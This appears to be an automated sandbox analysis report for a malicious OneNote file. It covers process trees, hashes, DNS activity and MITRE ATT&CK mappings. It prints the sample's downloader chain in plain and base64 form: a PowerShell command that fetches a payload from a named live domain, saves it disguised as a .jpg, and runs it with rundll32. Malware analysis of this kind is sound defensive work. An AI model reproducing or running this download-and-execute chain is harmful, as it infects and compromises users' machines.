Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [system.text.encoding]::ascii.getstring([system.convert]::frombase64string('dqpazwnobybvzmyncnbvd2vyc2hlbgwgsw52b2tllvdlyljlcxvlc3qglvvsssbodhrwczovl3rhc3nvaw5tb2jpbglhcmlhlmnvbs81nkcwlzaxlmdpziatt3v0rmlszsbdolxwcm9ncmftzgf0yvxwdxr0es5qcgcncnj1bmrsbdmyiem6xhbyb2dyyw1kyxrhxhb1dhr5lmpwzyxxaw5kdqplegl0dqo='))

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL3Rhc3NvaW5tb2JpbGlhcmlhLmNvbS81NkcwLzAxLmdpZiAtT3V0RmlsZSBDOlxwcm9ncmFtZGF0YVxwdXR0eS5qcGcNCnJ1bmRsbDMyIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZyxXaW5kDQpleGl0DQo='))
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\in.cmd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -URI https://tassoinmobiliaria.com/56G0/01.gif -Ou
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\programdata\putty.jpg,Wind

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	11 Command and Scripting Interpreter	Path Interception	11 Process Injection	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	1 Non-Application Layer Protocol	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Rundll32	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	21 Virtualization/Sandbox Evasion	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	11 Process Injection	NTDS	2 File and Directory Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	12 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://tassoinmobiliaria.com/	0%	Avira URL Cloud	safe
https://tassoinmobiliaria.com/56G0/01.gif	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
docs.live.net	unknown	unknown	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.piriform.com/ccleaner	powershell.exe, 00000006.00000002.921770739.0000000000329000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	powershell.exe, 00000006.00000002.921770739.0000000000329000.00000004.00000020.00020000.00000000.sdmp	false		high
https://tassoinmobiliaria.com/	powershell.exe, 00000006.00000002.922123045.00000000035AD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://tassoinmobiliaria.com/56G0/01.gif	powershell.exe, 00000006.00000002.922123045.00000000035AD000.00000004.00000800.00020000.00000000.sdmp, in.cmd.4.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	800757
Start date and time:	2023-02-07 19:14:43 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 42s
Hypervisor based Inspection enabled:	false
Report type:	light
Cookbook file name:	default.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	Note.one
Detection:	MAL
Classification:	mal60.evad.winONE@10/7@1/0
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .one Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.42.12
Excluded domains from analysis (whitelisted): l-0003.l-msedge.net, common.be.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-commonafd-geo.onedrive.akadns.net, odc-commonafd-brs.onedrive.akadns.net
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: Note.one

Simulations

Behavior and APIs

Time	Type	Description
19:15:26	API Interceptor	21x Sleep call for process: powershell.exe modified

Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	174
Entropy (8bit):	5.198278499863093
Encrypted:	false
SSDEEP:	3:2EKDDGKSSJJFsLTzTH3x8J3k40sQCALTiV2qD8j7zBJTTeJ6Fk9zBJTKyMORrn:0SGYzLh8Jn0tLTiVNuXzTeJ62Jzp9Rrn
MD5:	D93CB9A2EFE4F83B0B512D89D7224353
SHA1:	4F219270683A851C26E5C4D556E1E6E0FCFDD1E1
SHA-256:	800C7008C80FA4D1EC75BB95924E1FDF701EF1596A3C7DD2A50BB6576C79C2EB
SHA-512:	A94673CE863778B6387E99D67FC191D4941320CEA948747188A75B75871B9BA7FFE1269720279C2E11AB9AF2D3B2F1BA4E488D05A604A0F2E4021B35185DF0B8
Malicious:	true
Preview:	..@echo off..powershell Invoke-WebRequest -URI https://tassoinmobiliaria.com/56G0/01.gif -Ou..tFile C:\programdata\putty.jpg..rundll32 C:\programdata\putty.jpg,Wind..exit....

C:\Users\user\AppData\Local\Microsoft\OneNote\14.0\OneNoteOfflineCache.onecache

Download File

Process:	C:\Program Files\Microsoft Office\Office14\ONENOTE.EXE
File Type:	OpenPGP Public Key
Category:	dropped
Size (bytes):	20974880
Entropy (8bit):	2.971175953091501E-4
Encrypted:	false
SSDEEP:	12:T2VYyfH88WJ/7jcUtrsZhANuEIvNaDV/R/FvNa:T2VYyfc88ptwZ+gIxnI
MD5:	C4D5DB703FEBCD6F2B114F7BA6DA3DAB
SHA1:	CFCBFD495B096317E5FAC50EAA7F4B285FE812FB
SHA-256:	F51EF31EAA925011FFC99BFDDAEAC4A8201BBE51648C8039E169EA71D2374486
SHA-512:	96B05964F46F6A8DE2285C947951BB569D2AF16A84A878F7A1A80BB906A1D882C09B7BF91FB583F0F936103E4076206D66D029619FAF36208FD5B41128B95AA2
Malicious:	false
Preview:	...DH..G....E...X...{.E.3#...................?.....I.......+...+...+...+.........................................................................................................................................8?l.qI.y.l1@.~..........c.W..A.I..=.}.............................x...x...x...x..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\OneNote_MigrationLog.txt

Download File

Process:	C:\Program Files\Microsoft Office\Office14\ONENOTE.EXE
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	62
Entropy (8bit):	4.78837897268536
Encrypted:	false
SSDEEP:	3:TFSwRsr1RjKTadM1kQov:TF5sZR2TL1c
MD5:	D8A904D0D5C151527D275F83989B44CE
SHA1:	DE3A4A066AA0DEEE4C3616058ED7AD2D30E8AAE3
SHA-256:	819898DE5D842169962DD6F6D2260B2ABB3F330BC2F8E0EAD86FAB021D547651
SHA-512:	CF6AEF1EDBF9569CA0589C30F0F1076B5EB4E7F3DB3A4493A275D951E71B8C0ED9BC152E0A0A613519215CDF5F938924592FD3470830B830B5F549042FB0044D
Malicious:	false
Preview:	.(2/7/2023 7:15:17 PM).No V1 Notebook. Exiting Migration...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\15M3XZRS569XGGKUX6EK.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5813581954944165
Encrypted:	false
SSDEEP:	96:MA0hQCYMqpqvsqvJCwoiizsA0hQCYMqpqvsEHyqvJCworwiz/dYiHXi01etlUV8c:/0+Moiizf0+4Hnorwiz/Zi01evijp
MD5:	15F01937754A86219A865FB3900F15DA
SHA1:	CAE27985638FBA73B1FF03F0E6B55C9D25C664CA
SHA-256:	8634F7DEA26B86245D64D2A4B488BCDB072BC02178E5333211F124A96CC331FC
SHA-512:	EE790B839032A3E3E5010493D2370EEF3054592A27F055D0FF9E9EECBA0519713B1D94AB6020033E4B5810DA995DBF12BBF5E58EF0E43A5CE023070D53567771
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....HV... PROGRA~3..D.......:..HV.....k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT.....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5813581954944165
Encrypted:	false
SSDEEP:	96:MA0hQCYMqpqvsqvJCwoiizsA0hQCYMqpqvsEHyqvJCworwiz/dYiHXi01etlUV8c:/0+Moiizf0+4Hnorwiz/Zi01evijp
MD5:	15F01937754A86219A865FB3900F15DA
SHA1:	CAE27985638FBA73B1FF03F0E6B55C9D25C664CA
SHA-256:	8634F7DEA26B86245D64D2A4B488BCDB072BC02178E5333211F124A96CC331FC
SHA-512:	EE790B839032A3E3E5010493D2370EEF3054592A27F055D0FF9E9EECBA0519713B1D94AB6020033E4B5810DA995DBF12BBF5E58EF0E43A5CE023070D53567771
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....HV... PROGRA~3..D.......:..HV.....k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT.....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF5f4367.TMP (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5813581954944165
Encrypted:	false
SSDEEP:	96:MA0hQCYMqpqvsqvJCwoiizsA0hQCYMqpqvsEHyqvJCworwiz/dYiHXi01etlUV8c:/0+Moiizf0+4Hnorwiz/Zi01evijp
MD5:	15F01937754A86219A865FB3900F15DA
SHA1:	CAE27985638FBA73B1FF03F0E6B55C9D25C664CA
SHA-256:	8634F7DEA26B86245D64D2A4B488BCDB072BC02178E5333211F124A96CC331FC
SHA-512:	EE790B839032A3E3E5010493D2370EEF3054592A27F055D0FF9E9EECBA0519713B1D94AB6020033E4B5810DA995DBF12BBF5E58EF0E43A5CE023070D53567771
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....HV... PROGRA~3..D.......:..HV.....k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT.....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RCSEMY5PNCKXDGZ3FK2J.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5813581954944165
Encrypted:	false
SSDEEP:	96:MA0hQCYMqpqvsqvJCwoiizsA0hQCYMqpqvsEHyqvJCworwiz/dYiHXi01etlUV8c:/0+Moiizf0+4Hnorwiz/Zi01evijp
MD5:	15F01937754A86219A865FB3900F15DA
SHA1:	CAE27985638FBA73B1FF03F0E6B55C9D25C664CA
SHA-256:	8634F7DEA26B86245D64D2A4B488BCDB072BC02178E5333211F124A96CC331FC
SHA-512:	EE790B839032A3E3E5010493D2370EEF3054592A27F055D0FF9E9EECBA0519713B1D94AB6020033E4B5810DA995DBF12BBF5E58EF0E43A5CE023070D53567771
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....HV... PROGRA~3..D.......:..HV.....k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT.....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

Static File Info

General

File type:	data
Entropy (8bit):	5.753059568472537
TrID:	Microsoft OneNote note (16024/2) 100.00%
File name:	Note.one
File size:	159160
MD5:	95f95c0cda4f5b050fdca00b02323d88
SHA1:	ec1daeab8b4aee1abeec3df3b82efe314c328bb9
SHA256:	636f8f5fa6d17d092007a750a38cbe4d171e608eab5b8264dbfa35209529cb9a
SHA512:	af0dfcd9ea68fcaa49cf86e41b9e9cb380a38e78ec791450ce141d1fc277dcda8bfb8fdd96dc3fc7e98acf9a5cd193ec68ce7554baa79e37ee3c1a20cbd0fb15
SSDEEP:	1536:fevY6z54EJ+ytgXIeZCXIokE9Kkf2oY7LLw7wDzKiivL4w1jr8TYEo7H2x0R6ZLg:2gS2EJbyYeMYkKkyX3DWvLLATijRgLg
TLSH:	0CF3D026B581864AC72A41390DE76FB47373BD029491671FDFB61E2C5DF0288CC9469F
File Content Preview:	.R\{...M..Sx.)..5._....O....7...................?......I........................................................................................@...................h...............8f......0....m..............u.w"U9.E..\,u..J7........R..@..N.&..5......

File Icon


Icon Hash:	a4a383c3e4d4d4c4

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 7, 2023 19:15:39.341501951 CET	55868	53	192.168.2.22	8.8.8.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 7, 2023 19:15:39.341501951 CET	192.168.2.22	8.8.8.8	0x5d1d	Standard query (0)	docs.live.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Feb 7, 2023 19:15:39.391026974 CET	8.8.8.8	192.168.2.22	0x5d1d	No error (0)	docs.live.net	common-afd.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 7, 2023 19:15:39.391026974 CET	8.8.8.8	192.168.2.22	0x5d1d	No error (0)	common-afd.fe.1drv.com	odc-commonafd-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false

Target ID:	1
Start time:	19:15:17
Start date:	07/02/2023
Path:	C:\Program Files\Microsoft Office\Office14\ONENOTE.EXE
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Microsoft Office\Office14\ONENOTE.EXE" "C:\Users\user\Desktop\Note.one
Imagebase:	0x13fa90000
File size:	2142560 bytes
MD5 hash:	6BF30A8AD15BB29FA479B700738DD188
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: cmd.exePID: 1116, Parent PID: 1860

General

Target ID:	4
Start time:	19:15:25
Start date:	07/02/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Open.cmd" "
Imagebase:	0x4a6f0000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: powershell.exePID: 1932, Parent PID: 1116

General

Target ID:	6
Start time:	19:15:25
Start date:	07/02/2023
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL3Rhc3NvaW5tb2JpbGlhcmlhLmNvbS81NkcwLzAxLmdpZiAtT3V0RmlsZSBDOlxwcm9ncmFtZGF0YVxwdXR0eS5qcGcNCnJ1bmRsbDMyIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZyxXaW5kDQpleGl0DQo='))
Imagebase:	0x13f570000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: cmd.exePID: 2608, Parent PID: 1116

General

Target ID:	8
Start time:	19:15:35
Start date:	07/02/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /K C:\ProgramData\in.cmd
Imagebase:	0x4a6f0000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: powershell.exePID: 1292, Parent PID: 2608

General

Target ID:	10
Start time:	19:15:36
Start date:	07/02/2023
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Invoke-WebRequest -URI https://tassoinmobiliaria.com/56G0/01.gif -Ou
Imagebase:	0x13f020000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: rundll32.exePID: 1672, Parent PID: 2608

General

Target ID:	11
Start time:	19:15:38
Start date:	07/02/2023
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32 C:\programdata\putty.jpg,Wind
Imagebase:	0xff8f0000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

⊘No disassembly

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

